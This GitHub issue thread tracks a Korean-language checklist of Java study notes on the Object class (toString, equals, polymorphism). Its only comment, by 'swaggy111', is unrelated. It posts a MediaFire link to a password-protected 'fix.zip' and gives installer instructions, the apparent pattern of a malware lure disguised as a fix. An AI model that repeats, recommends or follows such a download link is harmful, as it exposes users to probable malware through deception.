### ISSUE TITLE
[BasicJava] Object 객체

### ISSUE THREAD

**Issue by GuardJo** [GuardJo/tech-docs#11]
Java의 최상위 객체인 Object 객체에 대한 내용 정리

- [x] Object Class
- [x] Object 다형성
- [ ] Object 배열
- [x] toString()
- [ ] Object와 OCP
- [x] equals()

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
